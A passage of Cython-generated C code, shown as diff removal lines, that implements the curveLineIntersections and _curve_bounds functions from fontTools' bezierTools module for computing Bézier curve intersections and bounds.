Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[2] = {0,0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int 
__pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("curveLineIntersections (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_curve,&__pyx_n_s_line,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - CYTHON_FALLTHROUGH; - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - default: goto __pyx_L5_argtuple_error; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_curve)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1248, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - CYTHON_FALLTHROUGH; - case 1: - if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_line)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[1]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1248, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("curveLineIntersections", 1, 2, 2, 1); __PYX_ERR(0, 1248, __pyx_L3_error) - } - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "curveLineIntersections") < 0)) __PYX_ERR(0, 1248, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs != 2)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 
1); - } - __pyx_v_curve = values[0]; - __pyx_v_line = values[1]; - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("curveLineIntersections", 1, 2, 2, __pyx_nargs); __PYX_ERR(0, 1248, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_AddTraceback("fontTools.misc.bezierTools.curveLineIntersections", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_78curveLineIntersections(__pyx_self, __pyx_v_curve, __pyx_v_line); - - /* function exit code */ - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_78curveLineIntersections(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_curve, PyObject *__pyx_v_line) { - PyObject *__pyx_v_pointFinder = NULL; - PyObject *__pyx_v_intersections = NULL; - PyObject *__pyx_v_t = NULL; - PyObject *__pyx_v_pt = NULL; - PyObject *__pyx_v_line_t = NULL; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - Py_ssize_t __pyx_t_1; - int __pyx_t_2; - PyObject *__pyx_t_3 = NULL; - PyObject *__pyx_t_4 = NULL; - PyObject *__pyx_t_5 = NULL; - int __pyx_t_6; - PyObject *(*__pyx_t_7)(PyObject *); - PyObject *__pyx_t_8 = NULL; - PyObject *__pyx_t_9 = NULL; - int __pyx_t_10; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("curveLineIntersections", 1); - - /* "fontTools/misc/bezierTools.py":1269 - * (84.9000930760723, 189.87306176459828) - * """ - 
* if len(curve) == 3: # <<<<<<<<<<<<<< - * pointFinder = quadraticPointAtT - * elif len(curve) == 4: - */ - __pyx_t_1 = PyObject_Length(__pyx_v_curve); if (unlikely(__pyx_t_1 == ((Py_ssize_t)-1))) __PYX_ERR(0, 1269, __pyx_L1_error) - __pyx_t_2 = (__pyx_t_1 == 3); - if (__pyx_t_2) { - - /* "fontTools/misc/bezierTools.py":1270 - * """ - * if len(curve) == 3: - * pointFinder = quadraticPointAtT # <<<<<<<<<<<<<< - * elif len(curve) == 4: - * pointFinder = cubicPointAtT - */ - __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_quadraticPointAtT); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1270, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_v_pointFinder = __pyx_t_3; - __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1269 - * (84.9000930760723, 189.87306176459828) - * """ - * if len(curve) == 3: # <<<<<<<<<<<<<< - * pointFinder = quadraticPointAtT - * elif len(curve) == 4: - */ - goto __pyx_L3; - } - - /* "fontTools/misc/bezierTools.py":1271 - * if len(curve) == 3: - * pointFinder = quadraticPointAtT - * elif len(curve) == 4: # <<<<<<<<<<<<<< - * pointFinder = cubicPointAtT - * else: - */ - __pyx_t_1 = PyObject_Length(__pyx_v_curve); if (unlikely(__pyx_t_1 == ((Py_ssize_t)-1))) __PYX_ERR(0, 1271, __pyx_L1_error) - __pyx_t_2 = (__pyx_t_1 == 4); - if (likely(__pyx_t_2)) { - - /* "fontTools/misc/bezierTools.py":1272 - * pointFinder = quadraticPointAtT - * elif len(curve) == 4: - * pointFinder = cubicPointAtT # <<<<<<<<<<<<<< - * else: - * raise ValueError("Unknown curve degree") - */ - __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_cubicPointAtT); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1272, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_v_pointFinder = __pyx_t_3; - __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1271 - * if len(curve) == 3: - * pointFinder = quadraticPointAtT - * elif len(curve) == 4: # <<<<<<<<<<<<<< - * pointFinder = cubicPointAtT - * else: - */ - goto __pyx_L3; - } - - /* "fontTools/misc/bezierTools.py":1274 - * pointFinder = cubicPointAtT - 
* else: - * raise ValueError("Unknown curve degree") # <<<<<<<<<<<<<< - * intersections = [] - * for t in _curve_line_intersections_t(curve, line): - */ - /*else*/ { - __pyx_t_3 = __Pyx_PyObject_Call(__pyx_builtin_ValueError, __pyx_tuple__4, NULL); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1274, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_Raise(__pyx_t_3, 0, 0, 0); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __PYX_ERR(0, 1274, __pyx_L1_error) - } - __pyx_L3:; - - /* "fontTools/misc/bezierTools.py":1275 - * else: - * raise ValueError("Unknown curve degree") - * intersections = [] # <<<<<<<<<<<<<< - * for t in _curve_line_intersections_t(curve, line): - * pt = pointFinder(*curve, t) - */ - __pyx_t_3 = PyList_New(0); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1275, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_v_intersections = ((PyObject*)__pyx_t_3); - __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1276 - * raise ValueError("Unknown curve degree") - * intersections = [] - * for t in _curve_line_intersections_t(curve, line): # <<<<<<<<<<<<<< - * pt = pointFinder(*curve, t) - * # Back-project the point onto the line, to avoid problems with - */ - __Pyx_GetModuleGlobalName(__pyx_t_4, __pyx_n_s_curve_line_intersections_t); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1276, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_5 = NULL; - __pyx_t_6 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_4))) { - __pyx_t_5 = PyMethod_GET_SELF(__pyx_t_4); - if (likely(__pyx_t_5)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_4); - __Pyx_INCREF(__pyx_t_5); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_4, function); - __pyx_t_6 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[3] = {__pyx_t_5, __pyx_v_curve, __pyx_v_line}; - __pyx_t_3 = __Pyx_PyObject_FastCall(__pyx_t_4, __pyx_callargs+1-__pyx_t_6, 2+__pyx_t_6); - __Pyx_XDECREF(__pyx_t_5); __pyx_t_5 = 0; - if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1276, __pyx_L1_error) - 
__Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - } - if (likely(PyList_CheckExact(__pyx_t_3)) || PyTuple_CheckExact(__pyx_t_3)) { - __pyx_t_4 = __pyx_t_3; __Pyx_INCREF(__pyx_t_4); - __pyx_t_1 = 0; - __pyx_t_7 = NULL; - } else { - __pyx_t_1 = -1; __pyx_t_4 = PyObject_GetIter(__pyx_t_3); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1276, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_7 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_4); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 1276, __pyx_L1_error) - } - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - for (;;) { - if (likely(!__pyx_t_7)) { - if (likely(PyList_CheckExact(__pyx_t_4))) { - { - Py_ssize_t __pyx_temp = __Pyx_PyList_GET_SIZE(__pyx_t_4); - #if !CYTHON_ASSUME_SAFE_MACROS - if (unlikely((__pyx_temp < 0))) __PYX_ERR(0, 1276, __pyx_L1_error) - #endif - if (__pyx_t_1 >= __pyx_temp) break; - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - __pyx_t_3 = PyList_GET_ITEM(__pyx_t_4, __pyx_t_1); __Pyx_INCREF(__pyx_t_3); __pyx_t_1++; if (unlikely((0 < 0))) __PYX_ERR(0, 1276, __pyx_L1_error) - #else - __pyx_t_3 = __Pyx_PySequence_ITEM(__pyx_t_4, __pyx_t_1); __pyx_t_1++; if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1276, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - #endif - } else { - { - Py_ssize_t __pyx_temp = __Pyx_PyTuple_GET_SIZE(__pyx_t_4); - #if !CYTHON_ASSUME_SAFE_MACROS - if (unlikely((__pyx_temp < 0))) __PYX_ERR(0, 1276, __pyx_L1_error) - #endif - if (__pyx_t_1 >= __pyx_temp) break; - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - __pyx_t_3 = PyTuple_GET_ITEM(__pyx_t_4, __pyx_t_1); __Pyx_INCREF(__pyx_t_3); __pyx_t_1++; if (unlikely((0 < 0))) __PYX_ERR(0, 1276, __pyx_L1_error) - #else - __pyx_t_3 = __Pyx_PySequence_ITEM(__pyx_t_4, __pyx_t_1); __pyx_t_1++; if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1276, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - #endif - } - } else { - __pyx_t_3 = __pyx_t_7(__pyx_t_4); - if (unlikely(!__pyx_t_3)) { - PyObject* exc_type = PyErr_Occurred(); - if 
(exc_type) { - if (likely(__Pyx_PyErr_GivenExceptionMatches(exc_type, PyExc_StopIteration))) PyErr_Clear(); - else __PYX_ERR(0, 1276, __pyx_L1_error) - } - break; - } - __Pyx_GOTREF(__pyx_t_3); - } - __Pyx_XDECREF_SET(__pyx_v_t, __pyx_t_3); - __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1277 - * intersections = [] - * for t in _curve_line_intersections_t(curve, line): - * pt = pointFinder(*curve, t) # <<<<<<<<<<<<<< - * # Back-project the point onto the line, to avoid problems with - * # numerical accuracy in the case of vertical and horizontal lines - */ - __pyx_t_3 = __Pyx_PySequence_Tuple(__pyx_v_curve); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1277, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_5 = PyTuple_New(1); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 1277, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_INCREF(__pyx_v_t); - __Pyx_GIVEREF(__pyx_v_t); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_5, 0, __pyx_v_t)) __PYX_ERR(0, 1277, __pyx_L1_error); - __pyx_t_8 = PyNumber_Add(__pyx_t_3, __pyx_t_5); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 1277, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_8); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - __pyx_t_5 = __Pyx_PyObject_Call(__pyx_v_pointFinder, __pyx_t_8, NULL); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 1277, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; - __Pyx_XDECREF_SET(__pyx_v_pt, __pyx_t_5); - __pyx_t_5 = 0; - - /* "fontTools/misc/bezierTools.py":1280 - * # Back-project the point onto the line, to avoid problems with - * # numerical accuracy in the case of vertical and horizontal lines - * line_t = _line_t_of_pt(*line, pt) # <<<<<<<<<<<<<< - * pt = linePointAtT(*line, line_t) - * intersections.append(Intersection(pt=pt, t1=t, t2=line_t)) - */ - __Pyx_GetModuleGlobalName(__pyx_t_5, __pyx_n_s_line_t_of_pt); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 1280, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __pyx_t_8 = 
__Pyx_PySequence_Tuple(__pyx_v_line); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 1280, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_8); - __pyx_t_3 = PyTuple_New(1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1280, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_INCREF(__pyx_v_pt); - __Pyx_GIVEREF(__pyx_v_pt); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_v_pt)) __PYX_ERR(0, 1280, __pyx_L1_error); - __pyx_t_9 = PyNumber_Add(__pyx_t_8, __pyx_t_3); if (unlikely(!__pyx_t_9)) __PYX_ERR(0, 1280, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_9); - __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = __Pyx_PyObject_Call(__pyx_t_5, __pyx_t_9, NULL); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1280, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - __Pyx_DECREF(__pyx_t_9); __pyx_t_9 = 0; - __Pyx_XDECREF_SET(__pyx_v_line_t, __pyx_t_3); - __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1281 - * # numerical accuracy in the case of vertical and horizontal lines - * line_t = _line_t_of_pt(*line, pt) - * pt = linePointAtT(*line, line_t) # <<<<<<<<<<<<<< - * intersections.append(Intersection(pt=pt, t1=t, t2=line_t)) - * return intersections - */ - __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_linePointAtT); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1281, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_9 = __Pyx_PySequence_Tuple(__pyx_v_line); if (unlikely(!__pyx_t_9)) __PYX_ERR(0, 1281, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_9); - __pyx_t_5 = PyTuple_New(1); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 1281, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_INCREF(__pyx_v_line_t); - __Pyx_GIVEREF(__pyx_v_line_t); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_5, 0, __pyx_v_line_t)) __PYX_ERR(0, 1281, __pyx_L1_error); - __pyx_t_8 = PyNumber_Add(__pyx_t_9, __pyx_t_5); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 1281, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_8); - __Pyx_DECREF(__pyx_t_9); __pyx_t_9 = 0; - __Pyx_DECREF(__pyx_t_5); 
__pyx_t_5 = 0; - __pyx_t_5 = __Pyx_PyObject_Call(__pyx_t_3, __pyx_t_8, NULL); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 1281, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; - __Pyx_DECREF_SET(__pyx_v_pt, __pyx_t_5); - __pyx_t_5 = 0; - - /* "fontTools/misc/bezierTools.py":1282 - * line_t = _line_t_of_pt(*line, pt) - * pt = linePointAtT(*line, line_t) - * intersections.append(Intersection(pt=pt, t1=t, t2=line_t)) # <<<<<<<<<<<<<< - * return intersections - * - */ - __Pyx_GetModuleGlobalName(__pyx_t_5, __pyx_n_s_Intersection); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 1282, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __pyx_t_8 = __Pyx_PyDict_NewPresized(3); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 1282, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_8); - if (PyDict_SetItem(__pyx_t_8, __pyx_n_s_pt, __pyx_v_pt) < 0) __PYX_ERR(0, 1282, __pyx_L1_error) - if (PyDict_SetItem(__pyx_t_8, __pyx_n_s_t1, __pyx_v_t) < 0) __PYX_ERR(0, 1282, __pyx_L1_error) - if (PyDict_SetItem(__pyx_t_8, __pyx_n_s_t2, __pyx_v_line_t) < 0) __PYX_ERR(0, 1282, __pyx_L1_error) - __pyx_t_3 = __Pyx_PyObject_Call(__pyx_t_5, __pyx_empty_tuple, __pyx_t_8); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1282, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; - __pyx_t_10 = __Pyx_PyList_Append(__pyx_v_intersections, __pyx_t_3); if (unlikely(__pyx_t_10 == ((int)-1))) __PYX_ERR(0, 1282, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1276 - * raise ValueError("Unknown curve degree") - * intersections = [] - * for t in _curve_line_intersections_t(curve, line): # <<<<<<<<<<<<<< - * pt = pointFinder(*curve, t) - * # Back-project the point onto the line, to avoid problems with - */ - } - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - - /* "fontTools/misc/bezierTools.py":1283 - * pt = linePointAtT(*line, line_t) - * 
intersections.append(Intersection(pt=pt, t1=t, t2=line_t)) - * return intersections # <<<<<<<<<<<<<< - * - * - */ - __Pyx_XDECREF(__pyx_r); - __Pyx_INCREF(__pyx_v_intersections); - __pyx_r = __pyx_v_intersections; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":1248 - * - * - * def curveLineIntersections(curve, line): # <<<<<<<<<<<<<< - * """Finds intersections between a curve and a line. - * - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_3); - __Pyx_XDECREF(__pyx_t_4); - __Pyx_XDECREF(__pyx_t_5); - __Pyx_XDECREF(__pyx_t_8); - __Pyx_XDECREF(__pyx_t_9); - __Pyx_AddTraceback("fontTools.misc.bezierTools.curveLineIntersections", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XDECREF(__pyx_v_pointFinder); - __Pyx_XDECREF(__pyx_v_intersections); - __Pyx_XDECREF(__pyx_v_t); - __Pyx_XDECREF(__pyx_v_pt); - __Pyx_XDECREF(__pyx_v_line_t); - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":1286 - * - * - * def _curve_bounds(c): # <<<<<<<<<<<<<< - * if len(c) == 3: - * return calcQuadraticBounds(*c) - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_81_curve_bounds(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_80_curve_bounds, "_curve_bounds(c)"); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_81_curve_bounds = {"_curve_bounds", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_81_curve_bounds, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_80_curve_bounds}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_81_curve_bounds(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, 
Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - PyObject *__pyx_v_c = 0; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[1] = {0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("_curve_bounds (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_c,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - default: goto __pyx_L5_argtuple_error; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_c)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1286, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "_curve_bounds") < 0)) __PYX_ERR(0, 1286, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs != 1)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - } - __pyx_v_c = values[0]; - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("_curve_bounds", 1, 1, 1, __pyx_nargs); __PYX_ERR(0, 1286, __pyx_L3_error) - 
__pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_AddTraceback("fontTools.misc.bezierTools._curve_bounds", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_80_curve_bounds(__pyx_self, __pyx_v_c); - - /* function exit code */ - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_80_curve_bounds(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_c) { - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - Py_ssize_t __pyx_t_1; - int __pyx_t_2; - PyObject *__pyx_t_3 = NULL; - PyObject *__pyx_t_4 = NULL; - PyObject *__pyx_t_5 = NULL; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("_curve_bounds", 1); - - /* "fontTools/misc/bezierTools.py":1287 - * - * def _curve_bounds(c): - * if len(c) == 3: # <<<<<<<<<<<<<< - * return calcQuadraticBounds(*c) - * elif len(c) == 4: - */ - __pyx_t_1 = PyObject_Length(__pyx_v_c); if (unlikely(__pyx_t_1 == ((Py_ssize_t)-1))) __PYX_ERR(0, 1287, __pyx_L1_error) - __pyx_t_2 = (__pyx_t_1 == 3); - if (__pyx_t_2) { - - /* "fontTools/misc/bezierTools.py":1288 - * def _curve_bounds(c): - * if len(c) == 3: - * return calcQuadraticBounds(*c) # <<<<<<<<<<<<<< - * elif len(c) == 4: - * return calcCubicBounds(*c) - */ - __Pyx_XDECREF(__pyx_r); - __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_calcQuadraticBounds); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1288, __pyx_L1_error) - 
__Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = __Pyx_PySequence_Tuple(__pyx_v_c); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1288, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_5 = __Pyx_PyObject_Call(__pyx_t_3, __pyx_t_4, NULL); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 1288, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __pyx_r = __pyx_t_5; - __pyx_t_5 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":1287 - * - * def _curve_bounds(c): - * if len(c) == 3: # <<<<<<<<<<<<<< - * return calcQuadraticBounds(*c) - * elif len(c) == 4: - */ - } - - /* "fontTools/misc/bezierTools.py":1289 - * if len(c) == 3: - * return calcQuadraticBounds(*c) - * elif len(c) == 4: # <<<<<<<<<<<<<< - * return calcCubicBounds(*c) - * raise ValueError("Unknown curve degree") - */ - __pyx_t_1 = PyObject_Length(__pyx_v_c); if (unlikely(__pyx_t_1 == ((Py_ssize_t)-1))) __PYX_ERR(0, 1289, __pyx_L1_error) - __pyx_t_2 = (__pyx_t_1 == 4); - if (__pyx_t_2) { - - /* "fontTools/misc/bezierTools.py":1290 - * return calcQuadraticBounds(*c) - * elif len(c) == 4: - * return calcCubicBounds(*c) # <<<<<<<<<<<<<< - * raise ValueError("Unknown curve degree") - * - */ - __Pyx_XDECREF(__pyx_r); - __Pyx_GetModuleGlobalName(__pyx_t_5, __pyx_n_s_calcCubicBounds); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 1290, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __pyx_t_4 = __Pyx_PySequence_Tuple(__pyx_v_c); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1290, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_3 = 